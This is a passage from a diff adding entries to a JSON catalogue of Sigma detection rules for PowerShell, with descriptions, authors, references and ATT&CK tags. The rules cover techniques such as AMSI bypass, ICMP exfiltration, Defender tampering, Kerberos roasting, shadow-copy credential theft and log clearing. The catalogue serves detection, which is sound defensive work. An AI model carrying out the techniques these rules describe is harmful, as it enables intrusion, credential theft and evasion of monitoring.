], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "value": "Execute Invoke-command on Remote Host" + }, + { + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "meta": { + "author": "Borna Talebi", + "creation_date": "2021/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_add_dnsclient_rule.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule" + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" + }, + { + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + ], + "filename": "posh_ps_susp_write_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "value": "PowerShell Write-EventLog Usage" + }, + { + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_adrecon_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "value": "PowerShell ADRecon Execution" + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_gpo.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO" + }, + { + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_localuser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "value": "Powershell LocalAccount Manipulation" + }, + { + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate usage of System.Net.NetworkInformation.Ping class" + ], + "filename": "posh_ps_icmp_exfiltration.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "value": "PowerShell ICMP Exfiltration" + }, + { + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "meta": { + "author": "Alina Stepchenkova, Group-IB, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_apt_silence_eda.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" + ] + }, + "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "value": "Silence.EDA Detection" + }, + { + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_test_netconnection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "value": "Testing Usage of Uncommonly Used Port" + }, + { + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate administration scripts" + ], + "filename": "posh_ps_hotfix_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", + "value": "PowerShell Hotfix Enumeration" + }, + { + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "meta": { + "author": "frack113, elhoim", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "value": "Tamper Windows Defender - ScriptBlockLogging" + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_wallpaper.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" + ], + "tags": [ + "attack.impact", + "attack.t1491.001" + ] + }, + "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "value": "Replace Desktop Wallpaper by Powershell" + }, + { + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_amsi_null_bits_bypass.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "value": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging" + }, + { + "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/21", + "falsepositive": [ + "Diagnostics" + ], + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" + ], + "tags": [ + "attack.t1003" + ] + }, + "uuid": "cd185561-4760-45d6-a63e-a51325112cae", + "value": "Live Memory Dump Using Powershell" + }, + { + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "meta": { + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (update)", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate use of the library for administrative activity" + ], + "filename": "posh_ps_aadinternals_cmdlets_execution.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" + ] + }, + "uuid": "91e69562-2426-42ce-a647-711b8152ced6", + "value": "AADInternals PowerShell Cmdlets Execution - PsScript" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_new_psdrive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share" + }, + { + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_request_kerberos_ticket.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", + "value": "Request A Single Ticket via PowerShell" + }, + { + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "meta": { + "author": "Sami Ruohonen", + "creation_date": "2018/07/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_ntfs_ads_access.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", + "value": "NTFS Alternate Data Stream" + }, + { + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_as_rep_roasting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "value": "Get-ADUser Enumeration Using UserAccountControl Flags" + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cmdlet_scheduled_task.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", + "value": "Powershell Create Scheduled Task" + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/03", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "posh_ps_timestomp.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", + "value": "Powershell Timestomp" + }, + { + "description": "Detects the use of PSAttack PowerShell hack tool", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_psattack.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "value": "PowerShell PSAttack" + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ] + }, + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_get_acl_service.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "value": "Service Registry Permissions Weakness Check" + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_create_volume_shadow_copy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "value": "Create Volume Shadow Copy with Powershell" + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_enable_psremoting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "value": "Enable Windows Remote Management" + }, + { + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Legitimate usage of the cmdlet to forward emails" + ], + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/12", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + ], + "filename": "posh_ps_susp_clear_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share" + }, + { + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "meta": { + "author": "frack113", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_frombase64string_archive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" + ], + "tags": "No established tags" + }, + "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script" + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 